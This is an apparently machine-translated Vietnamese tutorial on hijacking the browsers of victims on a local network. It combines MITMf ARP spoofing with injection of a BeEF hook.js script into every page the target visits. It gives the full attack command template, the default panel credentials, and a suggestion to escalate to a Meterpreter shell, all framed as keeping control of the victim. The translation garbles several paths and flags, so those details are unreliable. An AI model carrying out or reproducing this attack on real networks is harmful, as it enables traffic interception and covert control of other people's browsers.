Bạn có nhớ lần cuối chúng ta sử dụng BeEF không? Chà, bây giờ chúng ta có thể sử dụng nó một lần nữa, nhưng lần này là với MITMf! Chúng tôi sẽ tự động đưa tập lệnh hooking vào mọi trang web mà nạn nhân truy cập!
Yêu cầu
Nếu bạn chưa có nó, hãy cài đặt MITMf thông qua apt-get install mitmf . Bạn có thể muốn apt-get update trước. Nếu bạn muốn, bạn có thể sao chép nó từ kho Git ( git clone https://github.com/byt3bl33d3r/MITMf ), nhưng tôi đã gặp sự cố với phiên bản đó.
BeEF đã được cài đặt trong Kali / Back | Track.
Bước 1 Bắt đầu BeEF
Mở một thiết bị đầu cuối mới và gõ cd / usr / share / cow-xss / .
Như bạn có thể thấy, chúng tôi đã cài đặt BeEF và chúng tôi có thể tiếp tục và chạy nó bằng cách nhập ./beef . Bạn sẽ nhận được đầu ra này:
Bạn có thấy URL Hook không? Đó là quan trọng. Ghi nhớ hoặc sao chép URL được cung cấp.
Bước 2 Mở Bảng điều khiển
Bây giờ bạn có thể mở bảng điều khiển web BeEF bằng URL UI . Sau khi được trình bày với trang đăng nhập, bạn sẽ có thể đăng nhập bằng thông tin đăng nhập mặc định “thịt bò” cho cả tên người dùng và mật khẩu. Khi đã ở trong UI, bạn sẽ có màn hình này:
Bước 3 Tiêm tập lệnh Hook.js
Mở một thiết bị đầu cuối mới. Chúng tôi sẽ sử dụng MITMf để thêm tập lệnh hooking. Sử dụng mitmf –spagger –arp -i <interface> –gateway <router IP> –target <target IP> –inject –js-url <hook.js URL> làm định dạng.
–spfe tải plugin giả mạo
–arp chuyển hướng các gói ARP
-i chỉ định giao diện để tiêm các gói trên
–gateway đặt IP của bộ định tuyến của bạn để chuyển hướng qua
–target đặt IP đích để tiêm tập lệnh hook.js
–inject tải chức năng tiêm
–js-url chỉ định mã JavaScript để tiêm
Chẳng hạn, tôi sử dụng lệnh này:
Chạy lệnh và MITMf sẽ bắt đầu cung cấp cho bạn một số đầu ra.
MITMf đang nói với chúng tôi rằng họ đã đưa thành công tập lệnh hook.js vào các trang web mà mục tiêu đã truy cập.
Bước 4 Quay lại BeEF
Nếu chúng tôi kiểm tra bảng BeEF của chúng tôi, bạn sẽ thấy máy tính được nối ngay trên tab Trình duyệt trực tuyến .
Hãy nhớ trong các bài đăng XSS trước đây của tôi, nơi tôi nói nạn nhân phải ở lại trang web để bạn có quyền kiểm soát nó? Đoán xem cái gì? Bây giờ bạn không phải lo lắng về điều đó! MITMf sẽ tiếp tục đưa tập lệnh vào mọi trang web mà nạn nhân truy cập, vì vậy bạn sẽ không bao giờ mất quyền kiểm soát!
Phần kết luận
Bây giờ chúng tôi biết sức mạnh nào nằm trong MITMf … chúng tôi có thể làm được nhiều hơn thế. Từ đó, bạn có thể tiếp tục cố gắng khai thác máy nạn nhân và có thể nhận được lời nhắc của Meterpreter! Ah, niềm vui của các cuộc tấn công MitM …